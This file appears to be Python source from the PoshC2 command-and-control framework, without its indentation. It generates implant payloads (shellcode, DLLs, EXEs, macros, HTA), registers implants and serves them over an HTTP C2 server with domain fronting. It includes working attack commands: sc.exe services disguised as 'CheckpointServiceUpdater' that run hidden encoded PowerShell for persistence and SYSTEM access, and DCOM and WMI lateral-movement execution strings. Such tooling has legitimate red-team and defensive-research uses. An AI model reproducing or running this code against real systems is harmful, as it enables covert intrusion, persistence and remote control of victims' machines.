def do_createnewpayload(user, command, creds=None):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input("Comms URL: https://www.example.com ")
domain = (comms_url.lower()).replace('https://', '')
domain = domain.replace('http://', '')
domainfront = input("Domain front hostname: jobs.azureedge.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
randomid = randomuri(5)
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8],
proxyuser, proxypass, proxyurl, "", "", C2[17],
C2[18], C2[19], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreatePython("%s_" % name)
newPayload.CreateCS("%s_" % name)
new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser,
proxypass, credsexpire)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
daisyurl = input("Daisy Comms URL: .e.g. http://10.150.10.1:9999 ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, daisyurl, "", "", "", "", "",
proxynone, C2[17], C2[18], C2[19],
"%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
newPayload.CreateCS(name)
new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", daisyurl, daisyhostid,
"")
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def do_install_servicelevel_persistence(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[17], C2[18],
C2[19], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
def do_invoke_dcompayload(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[17], C2[18],
C2[19], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
def do_invoke_wmipayload(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[17], C2[18],
C2[19], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
def do_get_system(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "",
"", "", "", C2[17], C2[18], C2[19],
get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
def do_install_servicelevel_persistencewithproxy(user, command, randomuri):
C2 = get_c2server_all()
if C2[11] == "":
print_bad("Need to run createproxypayload first")
return
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[17], C2[18],
C2[19], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
def do_invoke_runasproxypayload(user, command, randomuri):
C2 = get_c2server_all()
if C2[11] == "":
print_bad("Need to run createproxypayload first")
return
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[17], C2[18],
C2[19], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
def do_createproxypayload(user, command, creds=None):
params = re.compile("createproxypayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
proxyurl = input(Colours.GREEN +
"Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13],
C2[11], "", "", C2[17], C2[18], C2[19],
"%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
newPayload.CreateDlls("Proxy")
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
newPayload.CreateCS("Proxy")
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass,
credsexpire)
print_good("Created new proxy payloads")
input("Press Enter to continue...")
clear()
def existingdb(db):
print("Using existing %s database / project" % db + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename("%spayloads" % PoshProjectDirectory,
"%spayloads_old" % PoshProjectDirectory)
os.makedirs("%spayloads" % PoshProjectDirectory)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], PayloadCommsHost,
DomainFrontHeader, C2[8], C2[12], C2[13], C2[11],
"", "", C2[17], C2[18], C2[19],
get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "")
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END)
if DomainFrontHeader:
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END)
else:
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
if not upstream_url:
upstream_url = PayloadCommsHost
if not domain_front:
domain_front = DomainFrontHeader
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "",
"", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
newPayload.CreateCS(name)
new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "")
print_good("Created new %s daisy payloads" % name)
def main(args):
httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if DatabaseType.lower() == "postgres":
try:
if get_db() > 0:
if len(os.listdir(PoshProjectDirectory)) > 2:
existingdb("postgres")
else:
print(
Colours.RED +
"[-] Project directory does not exist or is empty \n")
print(Colours.RED +
"[>] Create new postgres DB and remove dir (%s) \n" %
PoshProjectDirectory)
sys.exit(1)
else:
newdb("postgres")
except Exception as e:
print(e)
traceback.print_exc()
print(Colours.RED +
"[>] Create new postgres DB and remove dir (%s) \n" %
PoshProjectDirectory)
sys.exit(1)
elif os.path.isfile(Database):
if len(os.listdir(PoshProjectDirectory)) > 2:
existingdb("sqlite")
else:
print(Colours.RED +
"[-] Project directory does not exist (%s) \n" %
PoshProjectDirectory)
sys.exit(1)
else:
newdb("sqlite")
C2 = get_c2server_all()
print("" + Colours.GREEN)
print("CONNECT URL: " + get_newimplanturl() + Colours.GREEN)
print("QUICKCOMMAND URL: " + select_item("QuickCommand", "C2Server") +
Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
print("")
print("PayloadCommsHost: " + select_item("PayloadCommsHost", "C2Server") +
Colours.GREEN)
print("DomainFrontHeader: " +
str(select_item("DomainFrontHeader", "C2Server")) + Colours.GREEN)
global KEY
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" %
(BindIP, BindPort))
from datetime import date, datetime
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print(Colours.RED + ("\nKill Date is - %s - expires in %s days" %
(C2[5], datedifference)))
else:
print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" %
(C2[5], datedifference)))
print(Colours.END)
if "https://" in PayloadCommsHost.strip():
if (os.path.isfile(
"%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile(
"%sposh.key" % PoshProjectDirectory)):
try:
httpd.socket = ssl.wrap_socket(
httpd.socket,
keyfile="%sposh.key" % PoshProjectDirectory,
certfile="%sposh.crt" % PoshProjectDirectory,
server_side=True,
ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(
httpd.socket,
keyfile="%sposh.key" % PoshProjectDirectory,
certfile="%sposh.crt" % PoshProjectDirectory,
server_side=True,
ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" %
(BindIP, BindPort))
sys.exit(0)
def do_GET(self):
try:
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n",
str(self.path), str(self.headers))
new_implant_url = get_newimplanturl()
self.cookieHeader = self.headers.get('Cookie')
self.ref = self.headers.get('Referer')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(new_task)
elif [ele for ele in sharplist if (ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"%s - [%s] Making GET connection to SharpSocks %s%s\r\n"
% (self.address_string(), self.log_date_time_string(),
SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath),
headers={
'Accept-Encoding': 'gzip',
'Cookie': '%s' % self.cookieHeader,
'User-Agent': UserAgent
})
res = urlopen(r)
sharpout = res.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except HTTPError as e:
self.send_response(e.code)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n"
% (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory,
"a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n"
% (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory,
"a").write("[-] SharpSocks %s\r\n" % e)
print(
Colours.RED +
"Error with SharpSocks or old implant connection - is SharpSocks running"
+ Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response",
"C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in self.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rp" % QuickCommandURI) in self.path:
filename = "%spayload.txt" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = base64.b64encode(f.read())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in self.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in self.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in self.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c)
for c in content)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in self.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in self.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith(
"SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain),
str(User), str(Hostname), Arch, PID,
Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.SharpCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain),
str(User), str(Hostname), Arch, PID,
Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
else:
try:
cookieVal = (self.cookieHeader).replace(
"SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type,
str(Domain), str(User),
str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response",
"C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
else:
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response", "C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
except Exception as e:
if 'broken pipe' not in str(e).lower():
print_bad("Error handling GET request: " + e)
traceback.print_exc()
def newdb(db):
print("Initializing new project folder and %s database" % db +
Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(directory): os.makedirs(directory)
if not os.path.exists("%s/downloads" % directory):
os.makedirs("%s/downloads" % directory)
if not os.path.exists("%s/reports" % directory):
os.makedirs("%s/reports" % directory)
if not os.path.exists("%s/payloads" % directory):
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print(
"Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h"
)
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost,
gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep,
KillDate, GET_404_Response, PoshProjectDirectory,
PayloadCommsPort, QuickCommand, DownloadURI, "", "", "",
Sounds, URLS, SocksURLS, Insecure, UserAgent, Referrer,
Pushover_APIToken, Pushover_APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
rewriteHeader = [
"RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off",
"SSLProxyVerify none", "SSLProxyCheckPeerName off",
"SSLProxyCheckPeerExpire off",
"# Change IPs to point at C2 infrastructure below",
"Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"
]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules(
) + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13],
C2[11], "", "", C2[17], C2[18], C2[19],
get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreateDynamicCodeTemplate()
create_self_signed_cert(PoshProjectDirectory)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
